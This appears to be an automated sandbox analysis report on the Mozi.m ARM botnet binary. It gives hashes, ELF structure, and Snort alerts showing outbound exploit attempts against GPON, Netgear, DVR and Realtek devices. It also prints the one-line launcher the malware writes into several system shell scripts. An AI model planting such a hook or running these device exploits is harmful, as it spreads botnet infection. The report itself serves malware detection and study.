                                                                                                        /usr/share/doc/tmux/examples/bash_completion_tmux.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/xdotool/examples/ffsp.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                        Entropy (8bit):5.819679405566689
                                                                                                        TrID:
                                                                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                        File name:Mozi.m
                                                                                                        File size:307960
                                                                                                        MD5:eec5c6c219535fba3a0492ea8118b397
                                                                                                        SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
                                                                                                        SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
                                                                                                        SHA512:3482c8324a18302f0f37b6e23ed85f24fff9f50bb568d8fd7461bf57f077a7c592f7a88bb2e1c398699958946d87bb93ab744d13a0003f9b879c15e6471f7400
                                                                                                        SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                        File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                        Static ELF Info

                                                                                                        ELF header

                                                                                                        Class:ELF32
                                                                                                        Data:2's complement, little endian
                                                                                                        Version:1 (current)
                                                                                                        Machine:ARM
                                                                                                        Version Number:0x1
                                                                                                        Type:EXEC (Executable file)
                                                                                                        OS/ABI:UNIX - System V
                                                                                                        ABI Version:0
                                                                                                        Entry Point Address:0x8194
                                                                                                        Flags:0x4000002
                                                                                                        ELF Header Size:52
                                                                                                        Program Header Offset:52
                                                                                                        Program Header Size:32
                                                                                                        Number of Program Headers:5
                                                                                                        Section Header Offset:307280
                                                                                                        Section Header Size:40
                                                                                                        Number of Section Headers:17
                                                                                                        Header String Table Index:16

                                                                                                        Sections

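| Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
|---|---|---|---|---|---|---|---|---|---|---|
| | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0 |
| .init | PROGBITS | 0x80d4 | 0xd4 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
| .text | PROGBITS | 0x80f0 | 0xf0 | 0x34a98 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
| .fini | PROGBITS | 0x3cb88 | 0x34b88 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
| .rodata | PROGBITS | 0x3cb98 | 0x34b98 | 0xb9d0 | 0x0 | 0x2 | A | 0 | 0 | 8 |
| .ARM.extab | PROGBITS | 0x48568 | 0x40568 | 0x18 | 0x0 | 0x2 | A | 0 | 0 | 4 |
| .ARM.exidx | ARM_EXIDX | 0x48580 | 0x40580 | 0x128 | 0x0 | 0x82 | AL | 2 | 0 | 4 |
| .eh_frame | PROGBITS | 0x51000 | 0x41000 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
| .tbss | NOBITS | 0x51004 | 0x41004 | 0x8 | 0x0 | 0x403 | WAT | 0 | 0 | 4 |
| .init_array | INIT_ARRAY | 0x51004 | 0x41004 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
| .fini_array | FINI_ARRAY | 0x51008 | 0x41008 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
| .data.rel.ro | PROGBITS | 0x51010 | 0x41010 | 0x18 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
| .got | PROGBITS | 0x51028 | 0x41028 | 0xb8 | 0x4 | 0x3 | WA | 0 | 0 | 4 |
| .data | PROGBITS | 0x510e0 | 0x410e0 | 0x9ec8 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
| .bss | NOBITS | 0x5afa8 | 0x4afa8 | 0x25b90 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
| .ARM.attributes | ARM_ATTRIBUTES | 0x0 | 0x4afa8 | 0x16 | 0x0 | 0x0 | | 0 | 0 | 1 |
| .shstrtab | STRTAB | 0x0 | 0x4afbe | 0x90 | 0x0 | 0x0 | | 0 | 0 | 1 |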

                                                                                                        Program Segments

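| Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
|---|---|---|---|---|---|---|---|---|---|---|
| EXIDX | 0x40580 | 0x48580 | 0x48580 | 0x128 | 0x128 | 0x4 | R | 0x4 | | .ARM.exidx |
| LOAD | 0x0 | 0x8000 | 0x8000 | 0x406a8 | 0x406a8 | 0x5 | R E | 0x8000 | | .init .text .fini .rodata .ARM.extab .ARM.exidx |
| LOAD | 0x41000 | 0x51000 | 0x51000 | 0x9fa8 | 0x2fb38 | 0x6 | RW | 0x8000 | | .eh_frame .init_array .fini_array .data.rel.ro .got .data .bss |
| TLS | 0x41004 | 0x51004 | 0x51004 | 0x0 | 0x8 | 0x4 | R | 0x4 | | |
| GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0x7 | RWE | 0x4 | | |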

                                                                                                        Network Behavior

                                                                                                        Snort IDS Alerts

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 01/06/21-14:57:26.185762 | TCP | 2030092 | ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution | 47982 | 80 | 192.168.2.20 | 23.44.146.105 |
| 01/06/21-14:57:26.185762 | TCP | 2025883 | ET EXPLOIT MVPower DVR Shell UCE | 47982 | 80 | 192.168.2.20 | 23.44.146.105 |
| 01/06/21-14:57:26.486361 | TCP | 1200 | ATTACK-RESPONSES Invalid URL | 80 | 47982 | 23.44.146.105 | 192.168.2.20 |
| 01/06/21-14:57:29.197283 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 131.221.67.202 | 192.168.2.20 |
| 01/06/21-14:57:29.197335 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 131.221.67.202 | 192.168.2.20 |
| 01/06/21-14:57:29.197366 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 131.221.67.202 | 192.168.2.20 |
| 01/06/21-14:57:32.489291 | ICMP | 485 | ICMP Destination Unreachable Communication Administratively Prohibited | | | 83.163.237.112 | 192.168.2.20 |
| 01/06/21-14:57:32.518594 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 62.29.50.34 | 192.168.2.20 |
| 01/06/21-14:57:32.618894 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 173.182.213.7 | 192.168.2.20 |
| 01/06/21-14:57:33.115680 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 58.160.249.135 | 192.168.2.20 |
| 01/06/21-14:57:35.093214 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 121.134.134.1 | 192.168.2.20 |
| 01/06/21-14:57:35.445319 | ICMP | 485 | ICMP Destination Unreachable Communication Administratively Prohibited | | | 46.165.139.60 | 192.168.2.20 |
| 01/06/21-14:57:35.531431 | ICMP | 485 | ICMP Destination Unreachable Communication Administratively Prohibited | | | 195.229.0.147 | 192.168.2.20 |
| 01/06/21-14:57:35.576964 | ICMP | 485 | ICMP Destination Unreachable Communication Administratively Prohibited | | | 38.104.123.122 | 192.168.2.20 |
| 01/06/21-14:57:35.617698 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 112.121.132.18 | 192.168.2.20 |
| 01/06/21-14:57:36.448600 | ICMP | 485 | ICMP Destination Unreachable Communication Administratively Prohibited | | | 78.54.73.174 | 192.168.2.20 |
| 01/06/21-14:57:36.529036 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 4.31.203.214 | 192.168.2.20 |
| 01/06/21-14:57:36.909575 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 122.3.241.158 | 192.168.2.20 |
| 01/06/21-14:57:37.586988 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 136.232.125.82 | 192.168.2.20 |
| 01/06/21-14:57:38.492312 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 72.26.212.10 | 192.168.2.20 |
| 01/06/21-14:57:38.579459 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 81.17.34.55 | 192.168.2.20 |
| 01/06/21-14:57:38.598246 | ICMP | 485 | ICMP Destination Unreachable Communication Administratively Prohibited | | | 67.187.218.82 | 192.168.2.20 |
| 01/06/21-14:57:38.639817 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 76.125.58.81 | 192.168.2.20 |
| 01/06/21-14:57:38.656070 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 186.200.255.130 | 192.168.2.20 |
| 01/06/21-14:57:39.500793 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 78.77.181.70 | 192.168.2.20 |
| 01/06/21-14:57:39.607122 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.104.240.38 | 192.168.2.20 |
| 01/06/21-14:57:39.626237 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 173.240.48.5 | 192.168.2.20 |
| 01/06/21-14:57:39.696119 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 149.11.37.69 | 192.168.2.20 |
| 01/06/21-14:57:39.652838 | TCP | 2025576 | ET EXPLOIT HackingTrio UA (Hello, World) | 51592 | 80 | 192.168.2.20 | 35.168.169.85 |
| 01/06/21-14:57:39.652838 | TCP | 2027063 | ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) | 51592 | 80 | 192.168.2.20 | 35.168.169.85 |
| 01/06/21-14:57:39.698871 | TCP | 2020899 | ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution | 54436 | 80 | 192.168.2.20 | 107.170.200.206 |
| 01/06/21-14:57:45.647073 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 212.129.33.59 | 192.168.2.20 |
| 01/06/21-14:57:45.928250 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 99.22.6.187 | 192.168.2.20 |
| 01/06/21-14:57:46.789002 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 114.31.200.89 | 192.168.2.20 |
| 01/06/21-14:57:46.998950 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 94.140.74.213 | 192.168.2.20 |
| 01/06/21-14:57:48.379250 | UDP | 2030919 | ET TROJAN Mozi Botnet DHT Config Sent | 32998 | 14165 | 59.99.92.197 | 192.168.2.20 |
| 01/06/21-14:57:48.711967 | UDP | 2030919 | ET TROJAN Mozi Botnet DHT Config Sent | 8080 | 14165 | 117.202.68.123 | 192.168.2.20 |
| 01/06/21-14:57:48.786744 | UDP | 2030919 | ET TROJAN Mozi Botnet DHT Config Sent | 5353 | 14165 | 220.77.193.240 | 192.168.2.20 |
| 01/06/21-14:57:50.792341 | UDP | 2030919 | ET TROJAN Mozi Botnet DHT Config Sent | 18221 | 14165 | 117.215.212.106 | 192.168.2.20 |
| 01/06/21-14:57:53.818731 | TCP | 2025576 | ET EXPLOIT HackingTrio UA (Hello, World) | 59680 | 8080 | 192.168.2.20 | 115.15.161.14 |
| 01/06/21-14:57:53.818731 | TCP | 2027063 | ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) | 59680 | 8080 | 192.168.2.20 | 115.15.161.14 |
| 01/06/21-14:57:56.492941 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 81.92.108.157 | 192.168.2.20 |
| 01/06/21-14:57:56.537634 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 194.30.140.66 | 192.168.2.20 |
| 01/06/21-14:57:56.537677 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 194.30.140.66 | 192.168.2.20 |
| 01/06/21-14:57:56.702928 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 112.189.51.14 | 192.168.2.20 |
| 01/06/21-14:57:59.537589 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 194.30.140.66 | 192.168.2.20 |
| 01/06/21-14:58:00.488374 | ICMP | 485 | ICMP Destination Unreachable Communication Administratively Prohibited | | | 77.190.174.8 | 192.168.2.20 |
| 01/06/21-14:58:00.716605 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 58.159.213.117 | 192.168.2.20 |
| 01/06/21-14:58:01.492971 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 37.134.148.1 | 192.168.2.20 |
| 01/06/21-14:58:03.600643 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 64.201.64.18 | 192.168.2.20 |
| 01/06/21-14:58:03.600692 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 64.201.64.18 | 192.168.2.20 |
| 01/06/21-14:58:03.635948 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 76.167.21.18 | 192.168.2.20 |
| 01/06/21-14:58:03.695835 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 216.129.149.170 | 192.168.2.20 |
                                                                                                        01/06/21-14:58:03.695877ICMP399ICMP Destination Unreachable Host Unreachable216.129.149.170192.168.2.20
                                                                                                        01/06/21-14:58:03.695909ICMP399ICMP Destination Unreachable Host Unreachable216.129.149.170192.168.2.20
                                                                                                        01/06/21-14:58:06.600512ICMP399ICMP Destination Unreachable Host Unreachable64.201.64.18192.168.2.20
                                                                                                        01/06/21-14:58:07.506230ICMP401ICMP Destination Unreachable Network Unreachable81.228.84.35192.168.2.20
                                                                                                        01/06/21-14:58:07.539832TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5234480192.168.2.20107.154.165.234
                                                                                                        01/06/21-14:58:07.539832TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5234480192.168.2.20107.154.165.234
                                                                                                        01/06/21-14:58:07.609226TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4911680192.168.2.20195.154.172.83
                                                                                                        01/06/21-14:58:07.609226TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4911680192.168.2.20195.154.172.83
                                                                                                        01/06/21-14:58:07.804023TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5978480192.168.2.20158.199.197.56
                                                                                                        01/06/21-14:58:07.804023TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5978480192.168.2.20158.199.197.56
                                                                                                        01/06/21-14:58:10.706145ICMP399ICMP Destination Unreachable Host Unreachable112.190.86.46192.168.2.20
                                                                                                        01/06/21-14:58:21.922021TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4596080192.168.2.20104.97.230.229
                                                                                                        01/06/21-14:58:21.922021TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4596080192.168.2.20104.97.230.229
                                                                                                        01/06/21-14:58:22.290241TCP1200ATTACK-RESPONSES Invalid URL8045960104.97.230.229192.168.2.20
                                                                                                        01/06/21-14:58:22.535928ICMP485ICMP Destination Unreachable Communication Administratively Prohibited80.140.241.117192.168.2.20
                                                                                                        01/06/21-14:58:24.505547ICMP399ICMP Destination Unreachable Host Unreachable92.60.108.50192.168.2.20
                                                                                                        01/06/21-14:58:24.505603ICMP399ICMP Destination Unreachable Host Unreachable92.60.108.50192.168.2.20
                                                                                                        01/06/21-14:58:24.507541ICMP399ICMP Destination Unreachable Host Unreachable85.15.219.250192.168.2.20
                                                                                                        01/06/21-14:58:25.512444ICMP399ICMP Destination Unreachable Host Unreachable80.232.163.10192.168.2.20
                                                                                                        01/06/21-14:58:25.512494ICMP399ICMP Destination Unreachable Host Unreachable80.232.163.10192.168.2.20
                                                                                                        01/06/21-14:58:25.512511ICMP399ICMP Destination Unreachable Host Unreachable80.232.163.10192.168.2.20
                                                                                                        01/06/21-14:58:27.509570ICMP399ICMP Destination Unreachable Host Unreachable92.60.108.50192.168.2.20
                                                                                                        01/06/21-14:58:28.688440TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5240080192.168.2.2066.49.194.21
                                                                                                        01/06/21-14:58:28.688440TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5240080192.168.2.2066.49.194.21
                                                                                                        01/06/21-14:58:31.774382ICMP449ICMP Time-To-Live Exceeded in Transit152.255.144.50192.168.2.20
                                                                                                        01/06/21-14:58:35.786518TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3468480192.168.2.20203.146.142.202
                                                                                                        01/06/21-14:58:35.732667TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)467788080192.168.2.2023.243.117.203
                                                                                                        01/06/21-14:58:35.732667TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)467788080192.168.2.2023.243.117.203
                                                                                                        01/06/21-14:58:35.786518TCP2025883ET EXPLOIT MVPower DVR Shell UCE3468480192.168.2.20203.146.142.202
                                                                                                        01/06/21-14:58:37.968556TCP1201ATTACK-RESPONSES 403 Forbidden8034684203.146.142.202192.168.2.20
                                                                                                        01/06/21-14:58:38.155071TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)3664680192.168.2.20104.238.159.33
                                                                                                        01/06/21-14:58:38.155071TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)3664680192.168.2.20104.238.159.33
                                                                                                        01/06/21-14:58:38.517549ICMP449ICMP Time-To-Live Exceeded in Transit89.206.1.2192.168.2.20
                                                                                                        01/06/21-14:58:40.130831ICMP399ICMP Destination Unreachable Host Unreachable96.110.232.66192.168.2.20
                                                                                                        01/06/21-14:58:41.195477ICMP402ICMP Destination Unreachable Port Unreachable73.112.12.197192.168.2.20
                                                                                                        01/06/21-14:58:41.989791ICMP399ICMP Destination Unreachable Host Unreachable78.244.168.62192.168.2.20
                                                                                                        01/06/21-14:58:41.989828ICMP399ICMP Destination Unreachable Host Unreachable78.244.168.62192.168.2.20
                                                                                                        01/06/21-14:58:41.991395ICMP399ICMP Destination Unreachable Host Unreachable78.244.168.62192.168.2.20
                                                                                                        01/06/21-14:58:42.493771ICMP485ICMP Destination Unreachable Communication Administratively Prohibited46.164.1.124192.168.2.20
                                                                                                        01/06/21-14:58:45.613037ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited185.181.181.25192.168.2.20
                                                                                                        01/06/21-14:58:45.703692ICMP399ICMP Destination Unreachable Host Unreachable187.120.76.2192.168.2.20
                                                                                                        01/06/21-14:58:45.703733ICMP399ICMP Destination Unreachable Host Unreachable187.120.76.2192.168.2.20
                                                                                                        01/06/21-14:58:45.734427ICMP399ICMP Destination Unreachable Host Unreachable211.110.89.170192.168.2.20
                                                                                                        01/06/21-14:58:45.734457ICMP399ICMP Destination Unreachable Host Unreachable211.110.89.170192.168.2.20
                                                                                                        01/06/21-14:58:45.734466ICMP399ICMP Destination Unreachable Host Unreachable211.110.89.170192.168.2.20
                                                                                                        01/06/21-14:58:48.702987ICMP399ICMP Destination Unreachable Host Unreachable187.120.76.2192.168.2.20
                                                                                                        01/06/21-14:58:49.645557ICMP399ICMP Destination Unreachable Host Unreachable199.167.17.231192.168.2.20
                                                                                                        01/06/21-14:58:51.286542ICMP399ICMP Destination Unreachable Host Unreachable192.168.125.38192.168.2.20
                                                                                                        01/06/21-14:58:51.286564ICMP399ICMP Destination Unreachable Host Unreachable192.168.125.38192.168.2.20
                                                                                                        01/06/21-14:58:52.663358TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4836080192.168.2.2054.164.156.191
                                                                                                        01/06/21-14:58:52.747682ICMP399ICMP Destination Unreachable Host Unreachable88.223.136.2192.168.2.20
                                                                                                        01/06/21-14:58:52.747703ICMP399ICMP Destination Unreachable Host Unreachable88.223.136.2192.168.2.20
                                                                                                        01/06/21-14:58:52.747710ICMP399ICMP Destination Unreachable Host Unreachable88.223.136.2192.168.2.20
                                                                                                        01/06/21-14:58:52.663358TCP2025883ET EXPLOIT MVPower DVR Shell UCE4836080192.168.2.2054.164.156.191
                                                                                                        01/06/21-14:58:54.271212ICMP402ICMP Destination Unreachable Port Unreachable178.122.114.84192.168.2.20
                                                                                                        01/06/21-14:58:55.407198ICMP399ICMP Destination Unreachable Host Unreachable72.29.203.65192.168.2.20
                                                                                                        01/06/21-14:58:55.408761ICMP399ICMP Destination Unreachable Host Unreachable72.29.203.65192.168.2.20
                                                                                                        01/06/21-14:58:55.687509TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5006480192.168.2.20107.20.106.251
                                                                                                        01/06/21-14:58:55.687509TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5006480192.168.2.20107.20.106.251
                                                                                                        01/06/21-14:58:56.748679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5299852869192.168.2.20116.206.55.142
                                                                                                        01/06/21-14:58:57.066505ICMP399ICMP Destination Unreachable Host Unreachable97.33.112.9192.168.2.20
                                                                                                        01/06/21-14:58:57.676419ICMP449ICMP Time-To-Live Exceeded in Transit150.185.255.10192.168.2.20
                                                                                                        01/06/21-14:59:00.184618ICMP399ICMP Destination Unreachable Host Unreachable143.90.159.222192.168.2.20
                                                                                                        01/06/21-14:59:03.250766ICMP399ICMP Destination Unreachable Host Unreachable143.90.159.222192.168.2.20
                                                                                                        01/06/21-14:59:03.853110TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)3519680192.168.2.20104.115.250.114
                                                                                                        01/06/21-14:59:03.853110TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)3519680192.168.2.20104.115.250.114
                                                                                                        01/06/21-14:59:04.186294TCP1200ATTACK-RESPONSES Invalid URL8035196104.115.250.114192.168.2.20
                                                                                                        01/06/21-14:59:06.679811ICMP399ICMP Destination Unreachable Host Unreachable189.34.128.26192.168.2.20
                                                                                                        01/06/21-14:59:07.505679ICMP485ICMP Destination Unreachable Communication Administratively Prohibited129.16.2.234192.168.2.20
                                                                                                        01/06/21-14:59:07.851851ICMP399ICMP Destination Unreachable Host Unreachable88.223.136.2192.168.2.20
                                                                                                        01/06/21-14:59:10.520181ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.152.114.5192.168.2.20
                                                                                                        01/06/21-14:59:10.665829ICMP399ICMP Destination Unreachable Host Unreachable38.104.32.250192.168.2.20
                                                                                                        01/06/21-14:59:10.676133ICMP449ICMP Time-To-Live Exceeded in Transit103.9.136.110192.168.2.20
                                                                                                        01/06/21-14:59:10.676274ICMP449ICMP Time-To-Live Exceeded in Transit200.230.1.241192.168.2.20
                                                                                                        01/06/21-14:59:10.709483ICMP449ICMP Time-To-Live Exceeded in Transit43.246.162.37192.168.2.20
                                                                                                        01/06/21-14:59:11.027463ICMP449ICMP Time-To-Live Exceeded in Transit69.27.128.217192.168.2.20
                                                                                                        01/06/21-14:59:11.766311ICMP485ICMP Destination Unreachable Communication Administratively Prohibited168.95.157.5192.168.2.20
                                                                                                        01/06/21-14:59:17.493165ICMP485ICMP Destination Unreachable Communication Administratively Prohibited46.59.216.67192.168.2.20
                                                                                                        01/06/21-14:59:17.644489ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited154.95.78.148192.168.2.20
                                                                                                        01/06/21-14:59:17.757844ICMP402ICMP Destination Unreachable Port Unreachable201.5.240.99192.168.2.20
                                                                                                        01/06/21-14:59:17.777331TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4754280192.168.2.2045.196.102.179
                                                                                                        01/06/21-14:59:17.777331TCP2025883ET EXPLOIT MVPower DVR Shell UCE4754280192.168.2.2045.196.102.179
                                                                                                        01/06/21-14:59:20.505208ICMP399ICMP Destination Unreachable Host Unreachable89.176.100.130192.168.2.20
                                                                                                        01/06/21-14:59:20.554303ICMP399ICMP Destination Unreachable Host Unreachable89.96.148.18192.168.2.20
                                                                                                        01/06/21-14:59:20.554345ICMP399ICMP Destination Unreachable Host Unreachable89.96.148.18192.168.2.20
                                                                                                        01/06/21-14:59:20.554365ICMP399ICMP Destination Unreachable Host Unreachable89.96.148.18192.168.2.20
                                                                                                        01/06/21-14:59:20.731389ICMP399ICMP Destination Unreachable Host Unreachable150.99.191.46192.168.2.20
                                                                                                        01/06/21-14:59:20.735325ICMP399ICMP Destination Unreachable Host Unreachable150.99.191.46192.168.2.20
                                                                                                        01/06/21-14:59:23.735386ICMP399ICMP Destination Unreachable Host Unreachable150.99.191.46192.168.2.20
                                                                                                        01/06/21-14:59:24.510142ICMP485ICMP Destination Unreachable Communication Administratively Prohibited31.150.96.14192.168.2.20
                                                                                                        01/06/21-14:59:24.513714ICMP485ICMP Destination Unreachable Communication Administratively Prohibited46.165.182.127192.168.2.20
                                                                                                        01/06/21-14:59:24.653232ICMP399ICMP Destination Unreachable Host Unreachable64.59.132.10192.168.2.20
                                                                                                        01/06/21-14:59:24.779999TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound379708080192.168.2.20175.252.8.184
                                                                                                        01/06/21-14:59:24.779999TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution379708080192.168.2.20175.252.8.184
